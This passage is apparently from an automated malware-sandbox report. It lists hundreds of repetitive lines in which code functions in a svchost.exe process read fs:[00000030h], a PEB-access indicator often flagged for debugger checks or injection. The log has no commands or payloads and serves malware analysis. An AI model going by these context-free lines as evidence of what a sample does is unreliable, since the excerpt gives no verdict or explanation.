                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h]8_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h]8_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h]8_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h]8_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382A020 mov eax, dword ptr fs:[00000030h]8_2_0382A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382C020 mov eax, dword ptr fs:[00000030h]8_2_0382C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C6030 mov eax, dword ptr fs:[00000030h]8_2_038C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03832050 mov eax, dword ptr fs:[00000030h]8_2_03832050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6050 mov eax, dword ptr fs:[00000030h]8_2_038B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385C073 mov eax, dword ptr fs:[00000030h]8_2_0385C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D678E mov eax, dword ptr fs:[00000030h]8_2_038D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038307AF mov eax, dword ptr fs:[00000030h]8_2_038307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E47A0 mov eax, dword ptr fs:[00000030h]8_2_038E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383C7C0 mov eax, dword ptr fs:[00000030h]8_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B07C3 mov eax, dword ptr fs:[00000030h]8_2_038B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038527ED mov eax, dword ptr fs:[00000030h]8_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038527ED mov eax, dword ptr fs:[00000030h]8_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038527ED mov eax, dword ptr fs:[00000030h]8_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BE7E1 mov eax, dword ptr fs:[00000030h]8_2_038BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038347FB mov eax, dword ptr fs:[00000030h]8_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038347FB mov eax, dword ptr fs:[00000030h]8_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C700 mov eax, dword ptr fs:[00000030h]8_2_0386C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830710 mov eax, dword ptr fs:[00000030h]8_2_03830710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03860710 mov eax, dword ptr fs:[00000030h]8_2_03860710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C720 mov eax, dword ptr fs:[00000030h]8_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C720 mov eax, dword ptr fs:[00000030h]8_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386273C mov eax, dword ptr fs:[00000030h]8_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386273C mov ecx, dword ptr fs:[00000030h]8_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386273C mov eax, dword ptr fs:[00000030h]8_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AC730 mov eax, dword ptr fs:[00000030h]8_2_038AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386674D mov esi, dword ptr fs:[00000030h]8_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386674D mov eax, dword ptr fs:[00000030h]8_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386674D mov eax, dword ptr fs:[00000030h]8_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830750 mov eax, dword ptr fs:[00000030h]8_2_03830750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BE75D mov eax, dword ptr fs:[00000030h]8_2_038BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872750 mov eax, dword ptr fs:[00000030h]8_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872750 mov eax, dword ptr fs:[00000030h]8_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B4755 mov eax, dword ptr fs:[00000030h]8_2_038B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03838770 mov eax, dword ptr fs:[00000030h]8_2_03838770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840770 mov eax, dword ptr fs:[00000030h]8_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03834690 mov eax, dword ptr fs:[00000030h]8_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03834690 mov eax, dword ptr fs:[00000030h]8_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C6A6 mov eax, dword ptr fs:[00000030h]8_2_0386C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038666B0 mov eax, dword ptr fs:[00000030h]8_2_038666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A6C7 mov eax, dword ptr fs:[00000030h]8_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h]8_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h]8_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h]8_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h]8_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B06F1 mov eax, dword ptr fs:[00000030h]8_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B06F1 mov eax, dword ptr fs:[00000030h]8_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AE609 mov eax, dword ptr fs:[00000030h]8_2_038AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384260B mov eax, dword ptr fs:[00000030h]8_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872619 mov eax, dword ptr fs:[00000030h]8_2_03872619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E627 mov eax, dword ptr fs:[00000030h]8_2_0384E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03866620 mov eax, dword ptr fs:[00000030h]8_2_03866620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03868620 mov eax, dword ptr fs:[00000030h]8_2_03868620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383262C mov eax, dword ptr fs:[00000030h]8_2_0383262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384C640 mov eax, dword ptr fs:[00000030h]8_2_0384C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F866E mov eax, dword ptr fs:[00000030h]8_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F866E mov eax, dword ptr fs:[00000030h]8_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A660 mov eax, dword ptr fs:[00000030h]8_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A660 mov eax, dword ptr fs:[00000030h]8_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03862674 mov eax, dword ptr fs:[00000030h]8_2_03862674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03832582 mov eax, dword ptr fs:[00000030h]8_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03832582 mov ecx, dword ptr fs:[00000030h]8_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03864588 mov eax, dword ptr fs:[00000030h]8_2_03864588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E59C mov eax, dword ptr fs:[00000030h]8_2_0386E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B05A7 mov eax, dword ptr fs:[00000030h]8_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B05A7 mov eax, dword ptr fs:[00000030h]8_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B05A7 mov eax, dword ptr fs:[00000030h]8_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038545B1 mov eax, dword ptr fs:[00000030h]8_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038545B1 mov eax, dword ptr fs:[00000030h]8_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E5CF mov eax, dword ptr fs:[00000030h]8_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E5CF mov eax, dword ptr fs:[00000030h]8_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038365D0 mov eax, dword ptr fs:[00000030h]8_2_038365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A5D0 mov eax, dword ptr fs:[00000030h]8_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A5D0 mov eax, dword ptr fs:[00000030h]8_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E5E7 mov eax, dword ptr fs:[00000030h]8_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038325E0 mov eax, dword ptr fs:[00000030h]8_2_038325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C5ED mov eax, dword ptr fs:[00000030h]8_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386C5ED mov eax, dword ptr fs:[00000030h]8_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C6500 mov eax, dword ptr fs:[00000030h]8_2_038C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904500 mov eax, dword ptr fs:[00000030h]8_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840535 mov eax, dword ptr fs:[00000030h]8_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E53E mov eax, dword ptr fs:[00000030h]8_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E53E mov eax, dword ptr fs:[00000030h]8_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E53E mov eax, dword ptr fs:[00000030h]8_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E53E mov eax, dword ptr fs:[00000030h]8_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385E53E mov eax, dword ptr fs:[00000030h]8_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03838550 mov eax, dword ptr fs:[00000030h]8_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03838550 mov eax, dword ptr fs:[00000030h]8_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386656A mov eax, dword ptr fs:[00000030h]8_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386656A mov eax, dword ptr fs:[00000030h]8_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386656A mov eax, dword ptr fs:[00000030h]8_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EA49A mov eax, dword ptr fs:[00000030h]8_2_038EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038364AB mov eax, dword ptr fs:[00000030h]8_2_038364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038644B0 mov ecx, dword ptr fs:[00000030h]8_2_038644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BA4B0 mov eax, dword ptr fs:[00000030h]8_2_038BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038304E5 mov ecx, dword ptr fs:[00000030h]8_2_038304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03868402 mov eax, dword ptr fs:[00000030h]8_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03868402 mov eax, dword ptr fs:[00000030h]8_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03868402 mov eax, dword ptr fs:[00000030h]8_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382E420 mov eax, dword ptr fs:[00000030h]8_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382E420 mov eax, dword ptr fs:[00000030h]8_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382E420 mov eax, dword ptr fs:[00000030h]8_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382C427 mov eax, dword ptr fs:[00000030h]8_2_0382C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B6420 mov eax, dword ptr fs:[00000030h]8_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386A430 mov eax, dword ptr fs:[00000030h]8_2_0386A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E443 mov eax, dword ptr fs:[00000030h]8_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EA456 mov eax, dword ptr fs:[00000030h]8_2_038EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382645D mov eax, dword ptr fs:[00000030h]8_2_0382645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385245A mov eax, dword ptr fs:[00000030h]8_2_0385245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BC460 mov ecx, dword ptr fs:[00000030h]8_2_038BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385A470 mov eax, dword ptr fs:[00000030h]8_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385A470 mov eax, dword ptr fs:[00000030h]8_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385A470 mov eax, dword ptr fs:[00000030h]8_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840BBE mov eax, dword ptr fs:[00000030h]8_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840BBE mov eax, dword ptr fs:[00000030h]8_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E4BB0 mov eax, dword ptr fs:[00000030h]8_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E4BB0 mov eax, dword ptr fs:[00000030h]8_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03850BCB mov eax, dword ptr fs:[00000030h]8_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03850BCB mov eax, dword ptr fs:[00000030h]8_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03850BCB mov eax, dword ptr fs:[00000030h]8_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830BCD mov eax, dword ptr fs:[00000030h]8_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830BCD mov eax, dword ptr fs:[00000030h]8_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830BCD mov eax, dword ptr fs:[00000030h]8_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DEBD0 mov eax, dword ptr fs:[00000030h]8_2_038DEBD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03838BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03904B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03902B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03828B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03904A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03868A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03838AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03886AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03886ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03830AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03864AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03854A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03836A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03828918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C892B mov eax, dword ptr fs:[00000030h]
